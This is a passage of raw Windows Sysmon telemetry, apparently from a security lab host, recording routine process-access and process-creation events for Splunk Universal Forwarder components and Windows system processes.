Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:46.821{59A5CD1D-957E-6005-6005-00000000A301}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.898{59A5CD1D-9580-6005-6205-00000000A301}69884584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.742{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9580-6005-6205-00000000A301}6988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.742{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.742{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9580-6005-6205-00000000A301}6988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.742{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9580-6005-6205-00000000A301}6988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.742{59A5CD1D-9580-6005-6205-00000000A301}6988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.226{59A5CD1D-9580-6005-6105-00000000A301}42326516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.070{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9580-6005-6105-00000000A301}4232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.070{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.070{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.070{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.070{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.070{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9580-6005-6105-00000000A301}4232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.070{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9580-6005-6105-00000000A301}4232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:48.070{59A5CD1D-9580-6005-6105-00000000A301}4232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:49.570{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9581-6005-6305-00000000A301}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:49.570{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:49.570{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:49.570{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:49.570{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:49.570{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9581-6005-6305-00000000A301}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:49.570{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9581-6005-6305-00000000A301}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:49.570{59A5CD1D-9581-6005-6305-00000000A301}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:04:55.741{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 